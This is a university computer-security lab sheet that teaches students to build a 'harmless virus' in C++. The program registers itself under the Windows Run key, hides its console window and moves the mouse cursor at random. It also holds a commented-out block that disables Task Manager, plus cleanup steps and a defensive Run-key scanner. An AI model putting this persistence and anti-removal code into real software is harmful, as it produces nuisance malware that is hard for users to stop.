CO1508 Computer Systems & Security – Week 10


Building your harmless virus in C++ – Part 1 Windows Registry

Summary
You are going to explore the Windows Registry and learn how to make an application start
every time the computer is powered on. After that, you are going to build a C++ programme
that writes itself into the Windows Registry so that it starts every time the machine starts,
and then makes the mouse go crazy. It’s your little harmless virus!

Note
The C++ code in this lab sheet might contain errors and/or bugs. This is done on purpose.
One of the main aims of this practical is to get you to find solutions and debug your
code carefully. Don’t worry: when you’re stuck, your lab tutor will help.

Activities

1. Windows Registry

From the Start menu → type Run → Enter. In the Run window, type regedit and press Enter.
Click Yes at the User Account Control prompt (regedit runs elevated).
As we discussed during the lecture, the Windows Registry is a central database of system and
software configuration on a Windows machine. You’ll learn a trick to start an application
every time the machine is powered on (more precisely, every time a user logs on: the Run
key below is processed at logon).
Go to the following location:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
What can you see there? How many string values are there?

Now, right-click in the empty space, choose New → String Value and name it MyValue. Right-click
on MyValue and choose Modify (or simply double-click MyValue). In the Value data field,
put this: “C:\Windows\System32\mspaint.exe” (yes, including the double quotation marks: quoting
the path is what stops a path containing spaces from being read as a program name plus arguments).
Now, restart your machine and watch the result.
If everything works correctly, Paint should start automatically after you log on.
Why is this important? Can you think of a good use and a bad use of this feature? This key is
the standard per-user autostart location, used by installers and by malware alike, which is
also why it is one of the first places a defender checks on a suspicious machine.
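Before answering, it helps to look at the same key the way a defender does. The programme below is an added example, not part of this lab sheet: it lists every value under the current user’s Run key and flags any command whose executable sits somewhere an ordinary user can write to (a profile folder, Temp, ProgramData, or a path that is not even an absolute drive path), which is the usual shape of user-level persistence rather than of a properly installed application. The registry enumeration needs a Windows Unicode build and is compiled only there; the two parsing helpers are portable. The list of “user-writable” locations is a heuristic chosen for this example, and the unquoted-command parsing takes only the first token, a simplification of how Windows really resolves a command line.

```cpp
#include <cwctype>
#include <iostream>
#include <string>
#include <utility>
#include <vector>
#ifdef _WIN32
#include <windows.h>
#endif

// Extract the executable path from a Run-key command line.
// A leading double quote delimits the path; otherwise the first
// whitespace-separated token is taken (an approximation: CreateProcess
// tries longer and longer prefixes of an unquoted command line).
std::wstring ExeFromCommand(const std::wstring& command)
{
    size_t start = command.find_first_not_of(L" \t");
    if (start == std::wstring::npos) return L"";
    if (command[start] == L'"') {
        size_t end = command.find(L'"', start + 1);
        if (end == std::wstring::npos) return command.substr(start + 1);
        return command.substr(start + 1, end - start - 1);
    }
    size_t end = command.find_first_of(L" \t", start);
    return command.substr(start, end == std::wstring::npos ? std::wstring::npos : end - start);
}

// Heuristic chosen for this example: persistence that points into a profile,
// Temp or ProgramData directory, or that is not an absolute drive path at all,
// deserves a closer look. Installed software normally lives under Program Files.
bool InUserWritableLocation(std::wstring path)
{
    for (wchar_t& c : path) c = static_cast<wchar_t>(std::towlower(c));
    bool absolute = path.size() > 2 && std::iswalpha(path[0]) && path[1] == L':' && path[2] == L'\\';
    if (!absolute) return true;
    static const wchar_t* const markers[] = { L"\\users\\", L"\\programdata\\", L"\\temp\\", L"\\tmp\\" };
    for (const wchar_t* m : markers)
        if (path.find(m) != std::wstring::npos) return true;
    return false;
}

#ifdef _WIN32
// Enumerate every value under HKCU\...\Run as (value name, command) pairs.
// KEY_QUERY_VALUE is the only right needed for reading.
std::vector<std::pair<std::wstring, std::wstring>> ListRunEntries()
{
    std::vector<std::pair<std::wstring, std::wstring>> entries;
    HKEY key;
    if (RegOpenKeyExW(HKEY_CURRENT_USER,
                      L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                      0, KEY_QUERY_VALUE, &key) != ERROR_SUCCESS)
        return entries;
    wchar_t name[16384];                 // 16383 characters is the documented maximum value-name length
    std::vector<BYTE> data(64 * 1024);
    for (DWORD index = 0;; ++index) {
        DWORD nameLen = sizeof(name) / sizeof(name[0]);   // in/out: characters
        DWORD dataLen = static_cast<DWORD>(data.size());   // in/out: bytes
        DWORD type = 0;
        LONG rc = RegEnumValueW(key, index, name, &nameLen, nullptr, &type, data.data(), &dataLen);
        if (rc == ERROR_MORE_DATA) continue;               // value larger than our buffer: skip it
        if (rc != ERROR_SUCCESS) break;                    // ERROR_NO_MORE_ITEMS ends the list
        if (type != REG_SZ && type != REG_EXPAND_SZ) continue;
        std::wstring command(reinterpret_cast<wchar_t*>(data.data()), dataLen / sizeof(wchar_t));
        while (!command.empty() && command.back() == L'\0') command.pop_back();  // data may carry its terminator
        entries.emplace_back(std::wstring(name, nameLen), command);
    }
    RegCloseKey(key);
    return entries;
}
#endif

int main()
{
#ifdef _WIN32
    for (const auto& e : ListRunEntries()) {
        std::wstring exe = ExeFromCommand(e.second);
        std::wcout << (InUserWritableLocation(exe) ? L"[CHECK] " : L"[ok]    ")
                   << e.first << L" = " << e.second << L'\n';
    }
#else
    // Constructed sample command lines, so the parsing part can be tried off Windows.
    const wchar_t* samples[] = { L"\"C:\\Windows\\System32\\mspaint.exe\"",
                                 L"C:\\Users\\student\\source\\repos\\Week10-RegVirus.exe" };
    for (const wchar_t* s : samples)
        std::wcout << (InUserWritableLocation(ExeFromCommand(s)) ? L"[CHECK] " : L"[ok]    ") << s << L'\n';
#endif
    return 0;
}
```

Build it as a Unicode console application like the lab project and run it after section 1: the MyValue entry pointing at “C:\Windows\System32\mspaint.exe” comes out [ok], while an exe registered from under your user profile (as the programme in section 7 will be) is flagged for a closer look.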

CO1508 Computer Systems and Security, UCLAN – 2019-2020


2. Create Visual Studio C++ Project

Open Visual Studio and create a new “Windows Console Application” project under Visual C++,
named “Week10-RegVirus”.

3. Windows Registry API

Registry key values can be edited using regedit, as you did in section 1. Another way
of editing registry keys is through the Windows Registry API, a set of system functions
declared in the header winreg.h (you get it by including windows.h).
Here you can find all the functions provided by this API:
https://docs.microsoft.com/en-us/windows/desktop/api/winreg/
Examples of these functions are:
• RegOpenKey / RegOpenKeyEx
• RegCreateKey / RegCreateKeyEx
• RegCloseKey
• RegConnectRegistry
• RegQueryInfoKey
• RegQueryMultipleValues
The functions without the Ex suffix are kept for compatibility with 16-bit Windows; new code
should use the Ex versions, which take an explicit access mask so you can request only the
rights you need (for example KEY_SET_VALUE rather than KEY_ALL_ACCESS).

You have to spend some time reading about these functions and understanding how they work
and why you might need to use them. This is important for your assignment because you
should be able to answer any question about any line of code. It is also important for this
lab sheet, so that you can fix any bug in the code below.

We’ll do a Hello Registry exercise at the beginning to get you going :-) However, before
diving into the code details, remember these steps to change a registry key value
from a C++ programme:
• Open the key you want to edit (RegOpenKey/RegOpenKeyEx gives you a handle to it, an HKEY)
• Edit the value (RegSetValueEx)
• Close the key with RegCloseKey (every successful open must be matched by a close, or the
programme leaks the handle; note that RegSetValueEx itself writes the value and Windows
flushes it to disk lazily, so do not rely on RegCloseKey to do the writing)

In the code below, I’ll assume that you can refer to the link above (about winreg.h) to
understand the registry editing functions. I’ll only explain system functions when necessary.
Again, you have to spend some time reading and understanding the main functions in winreg.h.

4. Windows Registry – Handle to Key (HKEY)

In Section 1, we created a new entry to make Paint start every time we start the machine.
We’ll do the same now, but from C++. Write the following code into your C++ project:
#include "stdafx.h"      // Visual Studio precompiled header; remove if your project has none
#include <iostream>
#include <windows.h>     // Win32 API: winreg.h (registry) and winuser.h (MessageBox) come with it
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;

int main()
{
    HKEY RunKey;                                         // handle to the Run key once opened
    LPCTSTR valueP = TEXT("CO1508");                     // name of the value we create under Run
    char* data = "C:\\WINDOWS\\system32\\mspaint.exe";   // the command to run at logon

    // Step 1: open HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    // (key names are case-insensitive, so RUN and Run are the same key)
    if (RegOpenKey(HKEY_CURRENT_USER,
        TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\RUN"), &RunKey) != ERROR_SUCCESS)
    {
        cout << "Unable to open registry key. Exit.\n";
        return 0;
    }

    // Step 2: write the value as a REG_SZ string (data pointer and size in bytes)
    if (RegSetValueEx(RunKey, valueP, 0, REG_SZ, (LPBYTE)data,
        strlen(data) * sizeof(TCHAR)) != ERROR_SUCCESS)
    {
        RegCloseKey(RunKey);                             // Step 3: close the key on every path
        cout << "Unable to set the registry value. Exit.\n";
        return 0;
    }
    else
    {
        RegCloseKey(RunKey);
        cout << "Registry value is successfully set!\n";
        MessageBox(NULL, L"You're infected :-) I dare you to restart your machine!",
            L"Infection", MB_OKCANCEL);
    }
    return 0;
}

Now, build and run. Open the registry again and check the values under Run. Did it work? Do
you see anything strange there? The code ran without reporting an error, but it did not set the
value correctly. Try to fix the code. Hint: check the parameter types.

Once it’s fixed, build and run again. The correct value should now be under Run. Once it’s there,
save your work, restart your machine and check whether MS Paint starts automatically.
If you’re stuck, ask your lab tutor for help. Try to find the solution yourself first!

5. Windows Registry – Crazy Mouse

So far, you have learnt how to open a registry key and write a new value under Run. Now, let’s
write a programme that makes the mouse go crazy. In the same project, add the
following code to your previous one. Remember, put it before the final return 0!
    while (1)
    {
        srand(time(NULL));               // seed the pseudo-random number generator
        POINT point;
        GetCursorPos(&point);            // current cursor position, in screen coordinates
        for (int i = 0; i < 500000; i++)
        {
            // set x and y coordinates randomly (the loop also acts as a crude delay)
            point.x = rand() % 2000;
            point.y = rand() % 2000;
        }
        SetCursorPos(point.x, point.y);  // jump the cursor to the last random position
    }
    return 0;

Now, build and run. Click OK when you see the infection message. Now, I dare you to control
your mouse!!! :-)

Don’t worry, you can press Ctrl+Alt+Del to get to Windows Task Manager and kill the exe
to stop this madness. (Don’t end the Visual Studio task!) If you can’t control the mouse well
enough to get to Task Manager, use Alt+F4 on the keyboard to close the console window; closing
the console window terminates the process that owns it.

Try to run the code again, but this time use the keyboard to close the console window (use
Alt+F4). It looks as though our crazy mouse virus is weak and vulnerable to these two methods
(Windows Task Manager or Alt+F4). We’ll learn how to hide the console window, so it’ll be
more difficult to stop!!! But first, read the explanation of the new functions used above:

• srand(time(NULL)) initialises the pseudo-random number generator with the value of
time(NULL), which returns the current calendar time from the system. Seeding once, before the
loop, is the usual pattern: reseeding on every pass with the same second gives the same sequence
of rand() values, and therefore the same final position, until the clock ticks over.
• POINT is a structure representing an x-y coordinate point on a two-dimensional integer grid
(two LONG members, x and y).
• GetCursorPos(&point) retrieves the position of the mouse cursor, in screen coordinates, and
stores it in point (that is why the address of point is passed).
• SetCursorPos(point.x, point.y) moves the mouse cursor to the specified screen coordinates;
coordinates outside the screen are adjusted so the cursor stays on it.

6. Hide the Console Window

Add the two new lines (GetConsoleWindow and ShowWindow, marked NEW below) to your while loop:

    while (1)
    {
        srand(time(NULL));
        HWND hwnd = GetConsoleWindow();     // NEW: handle of our own console window
        POINT point;
        GetCursorPos(&point);
        ShowWindow(hwnd, SW_HIDE);          // NEW: hide it
        for (int i = 0; i < 500000; i++)
        {
            point.x = rand() % 2000;
            point.y = rand() % 2000;
        }
        SetCursorPos(point.x, point.y);
    }

Now, build and run. The console window will disappear. You can still use Task Manager to stop
it: expand Visual Studio in the process list and you’ll find Week10-RegVirus.exe there :-) You might
have to use the keyboard if your mouse is still crazy! Hiding the window only removes the target
for Alt+F4; the process itself is as visible to Task Manager (or tasklist) as before.

• GetConsoleWindow() retrieves the window handle used by the console associated with the
calling process.
• ShowWindow(hwnd, SW_HIDE) sets the specified window’s show state; SW_HIDE hides it. Check
the other parameter values here:
https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-showwindow

7. Windows Registry – Register Yourself to Run Every Time

We want to register the exe file of our virus so that it runs every time the machine starts. I’ll
post the full code here so you have the full picture. The code contains all the pieces from all
the sections in this lab sheet.
The new pieces (marked NEW in the comments) are the ones that find the exe’s own path with
GetModuleFileName and register it under the Run key as a second value.

#include "stdafx.h"      // Visual Studio precompiled header; remove if your project has none
#include <iostream>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;

int main()
{
    HKEY RunKey, SysKey;
    DWORD dwData = 1;                              // only used by the commented-out DisableTaskMgr block
    LPCTSTR valueP = TEXT("CO1508");               // value name for Paint
    LPCTSTR valueV = TEXT("Virus");                // NEW: value name for our own exe
    LPCTSTR data = TEXT("C:\\WINDOWS\\system32\\mspaint.exe");   // now a TCHAR string, not char*
    TCHAR VPath[MAX_PATH + 1];                     // NEW: buffer for our own full path

    // NEW: fully qualified path of the running exe (NULL = the exe of the current process)
    GetModuleFileName(NULL, VPath, MAX_PATH);

    if (RegOpenKey(HKEY_CURRENT_USER,
        TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\RUN"), &RunKey) != ERROR_SUCCESS)
    {
        cout << "Unable to open registry key. Exit.\n";
        return 0;
    }

    // cbData is in bytes and, for REG_SZ, must include the terminating null:
    // hence (length + 1) * sizeof(TCHAR)
    LONG PaintRun = RegSetValueEx(RunKey, valueP, 0, REG_SZ,
        (LPBYTE)data, (lstrlen(data) + 1) * sizeof(TCHAR));
    LONG RegVirusRun = RegSetValueEx(RunKey, valueV, 0, REG_SZ,          // NEW
        (LPBYTE)VPath, (lstrlen(VPath) + 1) * sizeof(TCHAR));

    if (PaintRun || RegVirusRun)                   // ERROR_SUCCESS is 0, so any non-zero result is a failure
    {
        RegCloseKey(RunKey);
        cout << "Unable to set the registry value. Exit.\n";
        return 0;
    }
    else
    {
        RegCloseKey(RunKey);
        cout << "Registry value is successfully set!\n";
        MessageBox(NULL, L"You're infected :-) I dare you to restart your machine!",
            L"Infection", MB_OKCANCEL);
    }

    /* Left commented out on purpose: this sets the DisableTaskMgr policy for the
       current user, so Task Manager refuses to open. Do not enable it on a machine
       you need to recover; if you do, delete the value again (regedit or RegDeleteValue). */
    /*
    LONG openRes = RegCreateKeyEx(HKEY_CURRENT_USER,
        L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
        0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &SysKey, NULL);

    if (openRes)
    {
        cout << "Error " << openRes << "\n";
        return 0;
    }

    RegSetValueEx(SysKey, L"DisableTaskMgr", 0, REG_DWORD, (LPBYTE)&dwData, sizeof(DWORD));
    RegCloseKey(SysKey);
    */

    while (1)
    {
        srand(time(NULL));
        HWND hwnd = GetConsoleWindow();
        POINT point;
        GetCursorPos(&point);
        ShowWindow(hwnd, SW_HIDE);                 // hide the console window

        for (int i = 0; i < 500000; i++)
        {
            point.x = rand() % 2000;
            point.y = rand() % 2000;
        }

        SetCursorPos(point.x, point.y);
    }

    return 0;
}

Now, build and run. Restart your machine and see what will happen. (When you have finished,
delete the CO1508 and Virus values from the Run key in regedit; otherwise the machine stays
“infected” at every logon.)

Back to the code: the only new function in this code is GetModuleFileName(NULL, VPath,
MAX_PATH).
It retrieves the fully qualified path of the file that contains the specified module. The
module must have been loaded by the current process, and NULL means the exe of the current
process itself. You can read about the parameters here:
https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-getmodulefilenamea
Can you figure out why we used MAX_PATH? Find the answer.
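The three steps from section 3 (open, edit, close), written as functions the way I would want to see them in the assignment. This is an added example, not the lab sheet’s own code, and it does not replace the listing above. Differences from the listing worth noticing: the key is opened with RegOpenKeyEx asking explicitly for KEY_SET_VALUE, the one right a write needs; the REG_SZ size is computed in bytes including the terminating null; the exe path is quoted so a directory name containing a space cannot be misread as a program plus arguments; the value is read back with RegGetValue to confirm what actually landed in the registry; and the value is deleted at the end so the lab machine is left clean. The registry calls are compiled only on Windows (Unicode build); RegSzBytes and QuoteIfNeeded are portable. The value name CO1508-Example is chosen for this example.

```cpp
#include <cwchar>
#include <iostream>
#include <string>
#ifdef _WIN32
#include <windows.h>
#endif

// Byte count RegSetValueEx needs for a REG_SZ value: the characters as stored
// (UTF-16 on Windows) plus the terminating null that the documentation requires.
size_t RegSzBytes(const std::wstring& value)
{
    return (value.size() + 1) * sizeof(wchar_t);
}

// Wrap a path in double quotes if it contains a space and is not quoted already.
// Unquoted, C:\Users\Jo Bloggs\app.exe is first tried as the program C:\Users\Jo
// with the argument Bloggs\app.exe, which is the classic unquoted-path hijack.
std::wstring QuoteIfNeeded(const std::wstring& path)
{
    if (path.empty() || path.front() == L'"') return path;
    if (path.find(L' ') == std::wstring::npos) return path;
    return L"\"" + path + L"\"";
}

#ifdef _WIN32
const wchar_t* const kRunKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run";

// Open, write, close. KEY_SET_VALUE is the only right the write needs.
bool SetRunValue(const std::wstring& name, const std::wstring& command)
{
    HKEY key;
    if (RegOpenKeyExW(HKEY_CURRENT_USER, kRunKey, 0, KEY_SET_VALUE, &key) != ERROR_SUCCESS)
        return false;
    LONG rc = RegSetValueExW(key, name.c_str(), 0, REG_SZ,
                             reinterpret_cast<const BYTE*>(command.c_str()),
                             static_cast<DWORD>(RegSzBytes(command)));
    RegCloseKey(key);   // release the handle on every path, success or not
    return rc == ERROR_SUCCESS;
}

// Read the value back. RegGetValue checks the type for us (RRF_RT_REG_SZ) and
// guarantees a null-terminated result, which a raw RegQueryValueEx does not.
bool ReadRunValue(const std::wstring& name, std::wstring& command)
{
    DWORD bytes = 0;
    if (RegGetValueW(HKEY_CURRENT_USER, kRunKey, name.c_str(), RRF_RT_REG_SZ,
                     nullptr, nullptr, &bytes) != ERROR_SUCCESS || bytes == 0)
        return false;
    std::wstring buffer(bytes / sizeof(wchar_t), L'\0');
    if (RegGetValueW(HKEY_CURRENT_USER, kRunKey, name.c_str(), RRF_RT_REG_SZ,
                     nullptr, &buffer[0], &bytes) != ERROR_SUCCESS)
        return false;
    buffer.resize(std::wcslen(buffer.c_str()));   // drop the terminator the size included
    command = buffer;
    return true;
}

// Remove the value again (also needs only KEY_SET_VALUE).
bool DeleteRunValue(const std::wstring& name)
{
    HKEY key;
    if (RegOpenKeyExW(HKEY_CURRENT_USER, kRunKey, 0, KEY_SET_VALUE, &key) != ERROR_SUCCESS)
        return false;
    LONG rc = RegDeleteValueW(key, name.c_str());
    RegCloseKey(key);
    return rc == ERROR_SUCCESS;
}
#endif

int main()
{
#ifdef _WIN32
    wchar_t self[MAX_PATH + 1];
    DWORD len = GetModuleFileNameW(nullptr, self, MAX_PATH);   // 0 on failure, MAX_PATH if truncated
    if (len == 0 || len >= MAX_PATH) { std::wcerr << L"could not get own path\n"; return 1; }

    const std::wstring name = L"CO1508-Example";     // value name chosen for this example
    std::wstring command = QuoteIfNeeded(self), stored;
    if (!SetRunValue(name, command)) { std::wcerr << L"write failed\n"; return 1; }
    if (ReadRunValue(name, stored)) std::wcout << L"stored: " << stored << L'\n';
    std::wcout << (stored == command ? L"read-back matches\n" : L"MISMATCH\n");
    DeleteRunValue(name);                            // leave the machine as we found it
#else
    // Off Windows only the portable helpers can run; show the quoting rule on a constructed path.
    std::wcout << QuoteIfNeeded(L"C:\\Users\\Jo Bloggs\\Week10-RegVirus.exe") << L'\n';
#endif
    return 0;
}
```

On Windows it prints the stored command and “read-back matches”, then removes the value again; to keep the entry, as the lab intends, drop the DeleteRunValue call. The read is restricted to REG_SZ through RRF_RT_REG_SZ, so a value of another type is reported as a failure rather than silently misread.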

8. The Assignment – Start now with these tasks

Now you should be able to start your assignment. You’ve been given the basics to do the
registry virus and manipulate registry values. In the time left in this lab, try to do the
following tasks in C++:
• Find out how to read a value from the registry and display it on screen
• Find out how to delete a specific registry value or key
• Find out how to access a path on the hard disk and delete the file you found in the
registry value

Finally, remember that you have to understand every line of code you’re writing. You’ll be
asked during the demo of your assignment. Therefore, don’t just copy/paste stuff.
